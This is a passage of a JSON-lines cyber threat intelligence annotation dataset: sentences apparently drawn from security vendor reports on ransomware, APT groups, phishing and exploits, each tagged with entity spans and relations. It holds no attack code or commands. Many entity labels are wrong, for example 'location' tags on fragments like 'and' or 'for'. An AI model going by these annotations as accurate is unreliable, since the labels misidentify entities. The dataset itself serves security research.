now.","entities":[{"id":45833,"label":"threat-actor","start_offset":58,"end_offset":65}],"relations":[],"Comments":[]} {"id":2561,"text":"We do believe there is evidence suggestive of a connection between Shamoon 2 and the Magic Hound campaign, which could indicate these two attack campaigns could have worked in conjunction with each other to execute the Shamoon 2 attacks.","entities":[{"id":47761,"label":"campaign","start_offset":85,"end_offset":105},{"id":47760,"label":"campaign","start_offset":67,"end_offset":76},{"id":47762,"label":"campaign","start_offset":219,"end_offset":228}],"relations":[{"id":350,"from_id":47761,"to_id":47760,"type":"related-to"}],"Comments":[]} {"id":2562,"text":" We also believe the presence of specific, valid named hosts from the network used in Stage 2 shows they were obtained directly from Active Directory on a domain controller.","entities":[{"id":47763,"label":"SOFTWARE","start_offset":133,"end_offset":149}],"relations":[],"Comments":[]} {"id":11672,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} {"id":4807,"text":"We believe there was no major impact on Android users and that the number of installs was miniscule.","entities":[{"id":50723,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} {"id":3848,"text":"The third version we found (5.1.2 rc1) reverts to a DLL file type but retains the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":13993,"text":"However, by comparing key pieces of information with known sources, it is possible to determine when a campaign was likely perpetrated by a certain group.","entities":[],"relations":[],"Comments":[]} {"id":8969,"text":"HyperBro","entities":[{"id":27710,"label":"malware","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":13090,"text":" Why IIoT matters Industrial IoT (IIoT) systems are already streamlining production processes, improving cost efficiencies, and helping to drive greater agility and innovation for manufacturers.","entities":[],"relations":[],"Comments":[]} {"id":2444,"text":" Once we deployed the Threat Prevention signatures, we analyzed the packet captures associated with our \"Spring Core Remote Code Execution Vulnerability\" signature and found that a majority of the activity was likely generated by variations of the publicly available PoC tools.","entities":[{"id":47512,"label":"vulnerability","start_offset":105,"end_offset":152}],"relations":[],"Comments":[]} {"id":14238,"text":"It created one legitimate project\/repository (mobile-phone-project) in June 2016, derived from another generic GitHub page.","entities":[{"id":48429,"label":"SOFTWARE","start_offset":111,"end_offset":118},{"id":48430,"label":"TIME","start_offset":71,"end_offset":80}],"relations":[],"Comments":[]} {"id":1025,"text":"Four hours later, we received confirmation that the custom email address \"claud@student.cnri.edu\" was active.","entities":[{"id":3215,"label":"TIME","start_offset":0,"end_offset":16},{"id":46516,"label":"EMAIL","start_offset":74,"end_offset":96}],"relations":[],"Comments":[]} {"id":11991,"text":"We terminated 1 YouTube channel as part of our ongoing investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} {"id":10751,"text":"REDBALDKNIGHT\u2019s tool can create, embed, and hide executables or configuration files within the image file with its tag and encrypted strings via steganography.","entities":[{"id":32855,"label":"threat-actor","start_offset":0,"end_offset":13},{"id":32856,"label":"location","start_offset":16,"end_offset":20},{"id":32857,"label":"location","start_offset":21,"end_offset":24},{"id":32858,"label":"location","start_offset":40,"end_offset":43},{"id":32859,"label":"location","start_offset":119,"end_offset":122}],"relations":[],"Comments":[]} {"id":2008,"text":"In the first sample we encountered (Figure 3, left), the ransom note only linked to a TOX ID, whereas a later observed sample (Figure 3, right) links to an onion domain as well as a TOX ID (different from the one in the first version).","entities":[],"relations":[],"Comments":[]} {"id":948,"text":"They provide an SDK and services to help developers display rich advertisements with a high pay rate.","entities":[],"relations":[],"Comments":[]} {"id":527,"text":" Figure 4 breaks down which file types we saw in the course of ransomware detection and their prevalence.","entities":[],"relations":[],"Comments":[]} {"id":2563,"text":"This is also suggestive of access to the network through legitimate, stolen credentials.","entities":[],"relations":[],"Comments":[]} {"id":2525,"text":"Conti\u2019s methodology often follows the \u201cdouble extortion\u201d approach that many leading ransomware groups are presently using.","entities":[{"id":47722,"label":"threat-actor","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":1411,"text":"Olivia Smith","entities":[{"id":46754,"label":"identity","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} {"id":2362,"text":"Notable features for this backdoor include: Our team is constantly working to secure our users and keep them safe from targeted attacks like this one.","entities":[],"relations":[],"Comments":[]} {"id":6466,"text":"This is a command to execute a PowerShell script of some kind.","entities":[{"id":20106,"label":"attack-pattern","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} {"id":13055,"text":"Weaponizing Open Source Software for Targeted Attacks","entities":[],"relations":[],"Comments":[]} {"id":561,"text":" Since Virlock only requests a $250 ransom, it does not draw too much public attention.","entities":[{"id":45795,"label":"malware","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} {"id":1021,"text":"Figure 5: A seller advertising a customizable \u201cxxx.edu\u201d email account.","entities":[],"relations":[],"Comments":[]} {"id":4090,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} {"id":5328,"text":"To send data to the C&C server, the core component performs a TLS handshake with a randomly chosen C&C server at a random TCP port, both of which are from a hard-coded list.","entities":[],"relations":[],"Comments":[]} {"id":2166,"text":" Microsoft has since released protection guidance and assigned CVE-2022-30190 to this vulnerability.","entities":[{"id":45406,"label":"identity","start_offset":1,"end_offset":10},{"id":45407,"label":"vulnerability","start_offset":63,"end_offset":77}],"relations":[],"Comments":[]} {"id":12537,"text":"The landing page contained a simple HTML page loading two scripts\u2014one for Capstone.js and another for the exploit chain.","entities":[{"id":39015,"label":"location","start_offset":4,"end_offset":11},{"id":39016,"label":"tools","start_offset":12,"end_offset":16},{"id":39017,"label":"malware","start_offset":41,"end_offset":45},{"id":39019,"label":"location","start_offset":66,"end_offset":69},{"id":39020,"label":"location","start_offset":86,"end_offset":89}],"relations":[],"Comments":[]} {"id":7328,"text":"Threat groups such as OceanLotus are actively updating malware variants in attempts to evade detection and improve persistence.","entities":[{"id":22805,"label":"threat-actor","start_offset":22,"end_offset":32},{"id":22806,"label":"location","start_offset":33,"end_offset":36},{"id":22807,"label":"location","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} {"id":2265,"text":"It was last updated on May 12, 2022.","entities":[{"id":45432,"label":"TIME","start_offset":23,"end_offset":35}],"relations":[],"Comments":[]} {"id":383,"text":"Assets running end-of-life software should never be internet-facing.","entities":[],"relations":[],"Comments":[]} {"id":2224,"text":"It continues to dynamically load a number of libraries and functions for later use.","entities":[],"relations":[],"Comments":[]} {"id":5299,"text":"It also enables non-blocking I\/O for the writing file descriptor by using ioctl().","entities":[],"relations":[],"Comments":[]} {"id":13332,"text":"Just last May, Trend Micro connected the group to ransomware attacks on Taiwanese organizations.","entities":[],"relations":[],"Comments":[]} {"id":10588,"text":"The exploits were delivered via compromised legitimate websites (e.g. watering hole attacks), links to malicious websites, and email attachments in limited spear phishing campaigns.","entities":[{"id":32300,"label":"location","start_offset":79,"end_offset":83},{"id":32301,"label":"location","start_offset":123,"end_offset":126},{"id":32302,"label":"attack-pattern","start_offset":156,"end_offset":170}],"relations":[],"Comments":[]} {"id":880,"text":" Figure 2. Check by PClock2 for hooking of sleep function A simple check is performed to determine if the malware is running with administrative privileges.","entities":[{"id":46413,"label":"malware","start_offset":20,"end_offset":27},{"id":46414,"label":"attack-pattern","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} {"id":12208,"text":"We terminated 123 YouTube channels as part of our investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} {"id":1338,"text":" The malware proceeds to make an attempt at binding to the local host on port 1139.","entities":[],"relations":[],"Comments":[]} {"id":10355,"text":"The PS function from which PRB-Backdoor takes its name","entities":[],"relations":[],"Comments":[]} {"id":1349,"text":" Though both attacks have targeted Ukrainian organizations, the two threats have so far been implemented in separate situations.","entities":[{"id":46678,"label":"identity","start_offset":35,"end_offset":58}],"relations":[],"Comments":[]} {"id":8574,"text":"Targets typically had to navigate through at least one redirect before landing on a phishing domain.","entities":[{"id":26499,"label":"location","start_offset":71,"end_offset":78},{"id":26500,"label":"attack-pattern","start_offset":84,"end_offset":92}],"relations":[],"Comments":[]} {"id":13412,"text":"We haven\u2019t retrieved a copy of the exploit.","entities":[],"relations":[],"Comments":[]} {"id":5533,"text":"Indeed, the Magecart attackers have proven over the past year that no website is safe from skimming attacks.","entities":[{"id":51531,"label":"malware","start_offset":12,"end_offset":20}],"relations":[],"Comments":[]} {"id":4632,"text":"The oldest known sample is from 2020, and the tool is still under active development.","entities":[{"id":50551,"label":"TIME","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} {"id":4836,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} {"id":6546,"text":"Based on the use of domain names they registered, the group started out in the business of fake\/rogue anti-virus products in 2007.","entities":[{"id":20294,"label":"malware","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} {"id":10045,"text":"Another file, ps, is a Linux executable that serves as an SSH backdoor.","entities":[],"relations":[],"Comments":[]} {"id":9588,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[],"relations":[],"Comments":[]} {"id":14013,"text":"That action by itself potentially introduces other leads that developers may forget to clean.","entities":[],"relations":[],"Comments":[]} {"id":461,"text":"Attackers developed DGA specifically to counter these actions.","entities":[],"relations":[],"Comments":[]} {"id":3769,"text":" The content of this exploit file can be observed below.","entities":[],"relations":[],"Comments":[]} {"id":432,"text":"While the user will experience a slow-down as the coin mining software is run, it is (or should be) expected, because of the notification, and so done with the site visitor\u2019s consent.","entities":[],"relations":[],"Comments":[]} {"id":6442,"text":" Figure 1. Phishing Email with the embedded URL The email attempts to convince recipients to click the URL and download a malicious file.","entities":[{"id":20051,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":20052,"label":"location","start_offset":116,"end_offset":119}],"relations":[],"Comments":[]} {"id":13938,"text":" In the Colonial Pipeline attack, DarkSide used double extortion.","entities":[{"id":48757,"label":"malware","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} {"id":5495,"text":"A tangled web of malware","entities":[],"relations":[],"Comments":[]} {"id":14093,"text":" Figure 11. Exfiltration command similarities. Code sharing","entities":[],"relations":[],"Comments":[]} {"id":184,"text":"Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially.","entities":[],"relations":[],"Comments":[]} {"id":14070,"text":"We also found that older samples from the previous SLUB campaigns in 2019 used a similar naming convention.","entities":[{"id":47380,"label":"malware","start_offset":51,"end_offset":56},{"id":47382,"label":"TIME","start_offset":69,"end_offset":74}],"relations":[],"Comments":[]} {"id":9756,"text":"The other layers are simple obfuscated PowerShell scripts.","entities":[{"id":29746,"label":"location","start_offset":17,"end_offset":20},{"id":29747,"label":"attack-pattern","start_offset":39,"end_offset":49}],"relations":[],"Comments":[]} {"id":5633,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":2205,"text":"This malware sample will also dynamically load a number of functions and libraries.","entities":[],"relations":[],"Comments":[]} {"id":7776,"text":"We also found that the file delivered is an .MSI executable containing the same .DLL FlawedAmmyy downloader.","entities":[{"id":24099,"label":"location","start_offset":75,"end_offset":79},{"id":24100,"label":"malware","start_offset":85,"end_offset":96}],"relations":[],"Comments":[]} {"id":2339,"text":"Despite the exploit being an executable instead of shellcode, it was not a standalone binary we could run in our virtual environment.","entities":[],"relations":[],"Comments":[]} {"id":13819,"text":"The second part of API hooking hooks on \u201cGetExtendedTcpTable.\u201d \u201cGetExtendedTcpTable\u201d is used for retrieving a table that contains a list of TCP endpoints available to the application, and it is frequently used in some network-related commands, such as netstat.","entities":[{"id":42866,"label":"attack-pattern","start_offset":23,"end_offset":30},{"id":42867,"label":"location","start_offset":31,"end_offset":36},{"id":42868,"label":"location","start_offset":132,"end_offset":136},{"id":42869,"label":"location","start_offset":184,"end_offset":187},{"id":42870,"label":"malware","start_offset":252,"end_offset":259}],"relations":[],"Comments":[]} {"id":3323,"text":" Figure 25.","entities":[],"relations":[],"Comments":[]} {"id":5421,"text":"This malware is modular in nature and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.","entities":[{"id":51428,"label":"malware","start_offset":142,"end_offset":155}],"relations":[],"Comments":[]} {"id":4605,"text":"IM Rules: 1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities Trend Micro Vision One\u2122 Correlation: Fig - Microsoft Exchange Server RCE Vulnerability (CVE-2021-26855 + CVE-2021-27065) Trend Micro Vision One\u2122 is a purpose-built, threat defense platform with extended detection and response (XDR) capabilities that work to prevent majority of attacks with automated protection.","entities":[{"id":50505,"label":"SOFTWARE","start_offset":83,"end_offset":106},{"id":50504,"label":"threat-actor","start_offset":46,"end_offset":53},{"id":50507,"label":"SOFTWARE","start_offset":213,"end_offset":236},{"id":50506,"label":"vulnerability","start_offset":131,"end_offset":208},{"id":50503,"label":"SOFTWARE","start_offset":25,"end_offset":43}],"relations":[],"Comments":[]} {"id":2966,"text":"After that, nothing spoils the fun and excitement of unboxing and playing with an exciting new device than trying to figure out what you need to do to use it with reasonable safety and privacy.","entities":[],"relations":[],"Comments":[]} {"id":9261,"text":"Detection: Delivered on 19\/19 attack steps in the evaluation, for 100% detection.","entities":[],"relations":[],"Comments":[]} {"id":4896,"text":"Around 15,000 actor accounts were identified, most of which were created for this campaign specifically.","entities":[],"relations":[],"Comments":[]} {"id":14038,"text":"In our case, the samples from the Operation Earth Kitsune implemented the Mattermost command and control (C2) communication and leaked a local path.","entities":[{"id":47199,"label":"campaign","start_offset":34,"end_offset":57},{"id":47200,"label":"SOFTWARE","start_offset":74,"end_offset":85}],"relations":[],"Comments":[]} {"id":3603,"text":"The combination of ConfuserEx and CyaX (Cassandra protector) seems to be unique and customized based on the indicators mentioned earlier.","entities":[{"id":49382,"label":"tools","start_offset":19,"end_offset":29},{"id":49383,"label":"tools","start_offset":34,"end_offset":39},{"id":49384,"label":"tools","start_offset":40,"end_offset":59}],"relations":[],"Comments":[]} {"id":7201,"text":"Besides the ActiveX objects, we noticed that the script added new code to connect websocket to localhost.","entities":[],"relations":[],"Comments":[]} {"id":2847,"text":"Multiple vendors report that the malware includes the ability to spread via port 445 scans and attacks against the ETERNALBLUE vulnerability not only on internal networks but also across the Internet.","entities":[{"id":45723,"label":"vulnerability","start_offset":115,"end_offset":126}],"relations":[],"Comments":[]} {"id":1259,"text":" Figure 1. Icons used by malicious Sysget attachments.","entities":[{"id":46635,"label":"malware","start_offset":35,"end_offset":41}],"relations":[],"Comments":[]} {"id":6991,"text":"Backdoor commands found in CapraRAT This APK file also has the ability to drop mp4 or APK files from asset directory.","entities":[],"relations":[],"Comments":[]} {"id":3320,"text":" The script will then upload database files inside the WeChat folder including \u201cMicroMsg.db\u201d to cloud storage.","entities":[{"id":48403,"label":"SOFTWARE","start_offset":55,"end_offset":61},{"id":48404,"label":"FILEPATH","start_offset":80,"end_offset":91}],"relations":[],"Comments":[]} {"id":2873,"text":"After that the exploit uses a ROP chain to overwrite the virtual function table of a sound object to gain full control.","entities":[],"relations":[],"Comments":[]} {"id":1872,"text":"Avast responded to our notification with this statement: \"We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in June 2021.","entities":[{"id":45157,"label":"FILEPATH","start_offset":123,"end_offset":135},{"id":45158,"label":"SOFTWARE","start_offset":159,"end_offset":169},{"id":45159,"label":"TIME","start_offset":182,"end_offset":191},{"id":45160,"label":"identity","start_offset":0,"end_offset":5}],"relations":[{"id":286,"from_id":45158,"to_id":45157,"type":"consists-of"}],"Comments":[]} {"id":5379,"text":" File download (0x0f) This module can download files from the internet.","entities":[],"relations":[],"Comments":[]} {"id":506,"text":"This post supplements that information based on observations from the first three months of 2021, and will discuss the propagation of different ransomware families we observed in the wild and the different types of extortion used.","entities":[{"id":46139,"label":"TIME","start_offset":92,"end_offset":96}],"relations":[],"Comments":[]} {"id":6121,"text":"We were able to uncover an additional two samples using the QTI International Inc certificate and Google Code pages.","entities":[{"id":18926,"label":"tools","start_offset":16,"end_offset":23},{"id":18929,"label":"location","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} {"id":4573,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50416,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50415,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50417,"label":"attack-pattern","start_offset":88,"end_offset":119}],"relations":[{"id":967,"from_id":50416,"to_id":50415,"type":"duplicate-of"},{"id":968,"from_id":50415,"to_id":50417,"type":"uses"}],"Comments":[]} {"id":10716,"text":"Additional analysis and insights by Higashi Yuka and Chizuru Toyama REDBALDKNIGHT, also known as BRONZE BUTLER and Tick, is a cyberespionage group known to target Japanese organizations such as government agencies (including defense) as well as those in biotechnology, electronics manufacturing, and industrial chemistry.","entities":[{"id":32718,"label":"location","start_offset":20,"end_offset":23},{"id":32720,"label":"location","start_offset":49,"end_offset":52},{"id":32722,"label":"threat-actor","start_offset":68,"end_offset":81},{"id":32724,"label":"location","start_offset":111,"end_offset":114},{"id":32725,"label":"threat-actor","start_offset":115,"end_offset":119},{"id":32726,"label":"location","start_offset":156,"end_offset":162},{"id":32728,"label":"location","start_offset":296,"end_offset":299},{"id":32729,"label":"location","start_offset":300,"end_offset":310}],"relations":[],"Comments":[]} {"id":5914,"text":"Link to Jon\u2019s panel discussion in Davos: https:\/\/www.youtube.com\/watch?v=GAZng8u9FXk","entities":[],"relations":[],"Comments":[]} {"id":4553,"text":"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.","entities":[{"id":50363,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} {"id":13564,"text":"These scripts were managed with an XSS attack framework called \u201cXSS.ME,\u201d which helps attackers deal with their attack scripts and the stolen information.","entities":[{"id":51644,"label":"attack-pattern","start_offset":35,"end_offset":38},{"id":51645,"label":"tools","start_offset":64,"end_offset":70}],"relations":[],"Comments":[]} {"id":4528,"text":"We recently expanded eligibility to protect Ukraine government organizations, and we are currently protecting over 200 Ukraine websites today.","entities":[{"id":50324,"label":"identity","start_offset":44,"end_offset":76},{"id":50325,"label":"location","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} {"id":3163,"text":"In addition, this move from AWS validates our XDR strategy, which is focused on using as many data sources as possible to enhance detection and response.","entities":[{"id":48283,"label":"identity","start_offset":28,"end_offset":31}],"relations":[],"Comments":[]} {"id":13480,"text":"Government-backed or state-sponsored groups have different goals in carrying out their attacks: Some are looking to collect intelligence or steal intellectual property; others are targeting dissidents or activists, or attempting to engage in coordinated influence operations and disinformation campaigns.","entities":[],"relations":[],"Comments":[]} {"id":2812,"text":" WanaCrypt0r is a global ransomware attack that emerged on Friday, May 12, 2017.","entities":[{"id":48030,"label":"malware","start_offset":1,"end_offset":12},{"id":48031,"label":"TIME","start_offset":59,"end_offset":79}],"relations":[],"Comments":[]} {"id":427,"text":"In this case, we are concerned about coin mining code that\u2019s used on websites.","entities":[],"relations":[],"Comments":[]} {"id":3106,"text":" Risk Assessment","entities":[],"relations":[],"Comments":[]} {"id":2581,"text":"Though sometimes called a ransomware group in reports, Lapsus$ is notable for not deploying ransomware in extortion attempts.","entities":[{"id":7789,"label":"threat-actor","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} {"id":5019,"text":"The data is then exfiltrated via email to a compromised email account.","entities":[],"relations":[],"Comments":[]} {"id":10429,"text":"Kaseya provides IT management software to mostly managed service providers (MSPs).","entities":[],"relations":[],"Comments":[]} {"id":8345,"text":"x.TextContent.StartsWith(\"Access for less secure apps has been turned on\") ||","entities":[],"relations":[],"Comments":[]} {"id":14307,"text":"Here, Uninstall.exe is used to get the Windows account and password, and then writes the result to C:\\Users\\%username%\\AppData\\local\\password.txt.","entities":[{"id":48527,"label":"SOFTWARE","start_offset":39,"end_offset":47},{"id":48526,"label":"FILEPATH","start_offset":6,"end_offset":19},{"id":48528,"label":"FILEPATH","start_offset":98,"end_offset":145}],"relations":[],"Comments":[]} {"id":10890,"text":" Figure 11. Code showing the creation of the directory ","entities":[],"relations":[],"Comments":[]} {"id":3635,"text":" You can see an image of how this works below in Figure 1. Figure 1 Conversation Hijacking to Deliver Malware How this works is that two users, Alice (A) and Bob (B) are carrying on an email conversation.","entities":[],"relations":[],"Comments":[]} {"id":4325,"text":"Behind the scenes, a .NET DLL file named skfk.txt, which is filled with content found inside the \u201cComments\u201d property of the document, is created in the temporary directory.","entities":[{"id":50127,"label":"FILEPATH","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} {"id":2950,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":13253,"text":"The first PDB string has a certain ss2\/Projects\/MsiWrapper (Project MsiWrapper) in it, which we found to be an open-source application that converts executable setup programs to MSI files.","entities":[{"id":41312,"label":"location","start_offset":35,"end_offset":38},{"id":41313,"label":"attack-pattern","start_offset":116,"end_offset":122}],"relations":[],"Comments":[]} {"id":12095,"text":"We believe this is a technique the attacker is using to evade detection rules.","entities":[],"relations":[],"Comments":[]} {"id":10999,"text":"We have also taken extraordinary measures beyond our actions against coordinated influence operations to protect users and stop the spread of misinformation and disinformation about the war in Ukraine online.","entities":[{"id":33527,"label":"location","start_offset":119,"end_offset":122},{"id":33528,"label":"malware","start_offset":123,"end_offset":127},{"id":33529,"label":"location","start_offset":157,"end_offset":160},{"id":33530,"label":"location","start_offset":186,"end_offset":189}],"relations":[],"Comments":[]} {"id":1680,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2609,"text":"When employed, various techniques to bypass MFA are observed \u2013 from social engineering, through SIM-swapping and even compromising MFA\/telecoms providers. Zero Trust network architecture and strong security hygiene are the best defenses against this type of threat actor.","entities":[],"relations":[],"Comments":[]} {"id":8039,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":24939,"label":"location","start_offset":11,"end_offset":15},{"id":24941,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} {"id":14170,"text":"On March 8, President Biden signed an Executive Order to ban the sale of Russian oil, liquefied natural gas and coal to the United States.","entities":[{"id":48210,"label":"TIME","start_offset":3,"end_offset":10},{"id":48213,"label":"location","start_offset":124,"end_offset":137},{"id":48211,"label":"identity","start_offset":12,"end_offset":27},{"id":48212,"label":"location","start_offset":73,"end_offset":81}],"relations":[],"Comments":[]} {"id":6135,"text":"The PlugX sample in Table 4 used the same Google Code page and redirect, but the QTI International Inc certificate.","entities":[{"id":18976,"label":"malware","start_offset":4,"end_offset":9},{"id":18977,"label":"location","start_offset":10,"end_offset":16},{"id":18979,"label":"location","start_offset":37,"end_offset":41},{"id":18980,"label":"tools","start_offset":54,"end_offset":58},{"id":18981,"label":"location","start_offset":59,"end_offset":62}],"relations":[],"Comments":[]} {"id":9809,"text":"Based on the language that was hardcoded in the samples we found, TICK appeared to be targeting Japanese organizations with subsidiaries in China to serve as footholds for intrusion: TICK hard-coded two code pages 932 and 936, referring to Japanese and Simplified Chinese characters respectively.","entities":[{"id":29908,"label":"threat-actor","start_offset":66,"end_offset":70},{"id":29911,"label":"threat-actor","start_offset":183,"end_offset":187},{"id":29912,"label":"location","start_offset":188,"end_offset":192},{"id":29915,"label":"location","start_offset":218,"end_offset":221},{"id":29918,"label":"location","start_offset":249,"end_offset":252}],"relations":[],"Comments":[]} {"id":1265,"text":"Five Sysget samples used to target two Japanese organizations.","entities":[{"id":46640,"label":"identity","start_offset":39,"end_offset":61},{"id":46641,"label":"malware","start_offset":5,"end_offset":11}],"relations":[],"Comments":[]} {"id":4309,"text":"While investigating the Confucius threat actor, we found a recent spear phishing campaign that utilizes Pegasus spyware-related lures to entice victims into opening a malicious document downloading a file stealer.","entities":[{"id":50105,"label":"attack-pattern","start_offset":66,"end_offset":80},{"id":50106,"label":"malware","start_offset":104,"end_offset":111}],"relations":[],"Comments":[]} {"id":4930,"text":"In this blog, we explore some of the most notable campaigns we\u2019ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":50945,"label":"threat-actor","start_offset":131,"end_offset":136},{"id":50947,"label":"location","start_offset":141,"end_offset":148}],"relations":[{"id":1033,"from_id":50945,"to_id":50947,"type":"located-at"}],"Comments":[]} {"id":13654,"text":"The email was sent from an IP address recorded on one of the phishing sites that the attacker tested its functionality on.","entities":[{"id":51744,"label":"attack-pattern","start_offset":61,"end_offset":69}],"relations":[],"Comments":[]} {"id":8741,"text":"We received leads from Facebook that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} {"id":8976,"text":"We found 13 different targets while following our sensors\u2018 data.","entities":[],"relations":[],"Comments":[]} {"id":14147,"text":" Tags Articles, News, Reports | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} {"id":5690,"text":"The first cluster is built using virtual private servers (VPS), rented from a service provider, that are used for the group\u2019s watering hole and spear phishing operations, in addition to acting as a command-and-control (C&C) server for malware.","entities":[{"id":17551,"label":"location","start_offset":101,"end_offset":104},{"id":17552,"label":"location","start_offset":135,"end_offset":139},{"id":17553,"label":"location","start_offset":140,"end_offset":143},{"id":17554,"label":"attack-pattern","start_offset":144,"end_offset":158},{"id":17555,"label":"location","start_offset":206,"end_offset":209}],"relations":[],"Comments":[]} {"id":1766,"text":" The first line of defense is the IPS.","entities":[],"relations":[],"Comments":[]} {"id":6917,"text":"The majority of targets we observed were from North Korea or individuals who worked on North Korea-related issues.","entities":[],"relations":[],"Comments":[]} {"id":1575,"text":" We are not aware of any reports of successful recovery after paying the ransom.","entities":[],"relations":[],"Comments":[]} {"id":12831,"text":"Public security Schedule Enterprises Need to be Proactive PLEAD, Shrouded Crossbow, and Waterbear","entities":[{"id":39972,"label":"location","start_offset":0,"end_offset":6},{"id":39973,"label":"location","start_offset":7,"end_offset":15},{"id":39974,"label":"malware","start_offset":60,"end_offset":65},{"id":39975,"label":"threat-actor","start_offset":67,"end_offset":84},{"id":39976,"label":"location","start_offset":86,"end_offset":89},{"id":39977,"label":"malware","start_offset":90,"end_offset":99}],"relations":[],"Comments":[]} {"id":5234,"text":" AnubisSpy can steal messages (SMS), photos, videos, contacts, email accounts, calendar events, and browser histories (i.e., Chrome and Samsung Internet Browser).","entities":[{"id":51267,"label":"malware","start_offset":1,"end_offset":10},{"id":51268,"label":"attack-pattern","start_offset":15,"end_offset":35},{"id":51269,"label":"SOFTWARE","start_offset":125,"end_offset":131},{"id":51270,"label":"SOFTWARE","start_offset":136,"end_offset":160}],"relations":[],"Comments":[]} {"id":165,"text":"These also happen to be files users are most likely to use on a day-to-day basis or that are critical to an organization\u2019s operations.","entities":[],"relations":[],"Comments":[]} {"id":12564,"text":"An N-day is a known vulnerability with a publicly available patch.","entities":[],"relations":[],"Comments":[]} {"id":13815,"text":"\u201cZwOpenProcess\u201d after modification","entities":[],"relations":[],"Comments":[]} {"id":1563,"text":"Palo Alto Networks Unit 42 regularly researches threats like these and provides information about them on our blog.","entities":[{"id":45057,"label":"identity","start_offset":0,"end_offset":26}],"relations":[],"Comments":[]} {"id":653,"text":"Once the fake chkdisk completes, the malware displays a ransom note which demands a payment of $300 in bitcoin.","entities":[],"relations":[],"Comments":[]} {"id":3009,"text":"Just like with home entertainment devices, it\u2019s the cloud-based account that attackers are more interested in.","entities":[],"relations":[],"Comments":[]} {"id":2455,"text":"Our Spring Core Remote Code Execution Vulnerability signature was released in the early hours of March 31.","entities":[{"id":47528,"label":"vulnerability","start_offset":4,"end_offset":51},{"id":47529,"label":"TIME","start_offset":82,"end_offset":105}],"relations":[],"Comments":[]} {"id":5162,"text":"Let us know in the comments below, hit us up on social @TrendMicro or you can reach me directly @marknca.","entities":[{"id":51216,"label":"identity","start_offset":96,"end_offset":104},{"id":51215,"label":"identity","start_offset":55,"end_offset":66}],"relations":[],"Comments":[]} {"id":12333,"text":"We terminated 3,317 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China.","entities":[],"relations":[],"Comments":[]} {"id":4628,"text":"Now, we\u2019re shining light on a new tool of theirs.","entities":[],"relations":[],"Comments":[]} {"id":767,"text":"Figure 4 shows an example of the structure in memory.","entities":[],"relations":[],"Comments":[]} {"id":4737,"text":"Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.","entities":[{"id":50649,"label":"location","start_offset":71,"end_offset":76},{"id":50650,"label":"location","start_offset":78,"end_offset":84},{"id":50651,"label":"location","start_offset":90,"end_offset":101},{"id":50652,"label":"identity","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} {"id":3227,"text":"The most important task of the c1222 script is to download, decode, and execute the Cobalt Strike shellcode.","entities":[{"id":48346,"label":"malware","start_offset":31,"end_offset":36},{"id":48345,"label":"tools","start_offset":84,"end_offset":97}],"relations":[],"Comments":[]} {"id":14338,"text":"Another thing that we discovered about the games offered by Round Year Fun is that if you authorize it to use your Twitter account, the author can use the account to promote games using automation tools.","entities":[{"id":48569,"label":"SOFTWARE","start_offset":115,"end_offset":123}],"relations":[],"Comments":[]} {"id":642,"text":" Delivery\/Exploitation","entities":[],"relations":[],"Comments":[]} {"id":11,"text":"Most legacy security programs could not detect this malware at the time it was posted.","entities":[],"relations":[],"Comments":[]} {"id":9522,"text":"However, it is possible that multiple groups might be covertly sharing the source code for this malware.","entities":[{"id":29212,"label":"attack-pattern","start_offset":75,"end_offset":81}],"relations":[],"Comments":[]} {"id":6214,"text":"Therefore, the victim also loads the malicious script with the replaced wrapper page whenever they access the webmail server with the malicious Service Worker enabled in the background.","entities":[{"id":19190,"label":"tools","start_offset":80,"end_offset":84}],"relations":[],"Comments":[]} 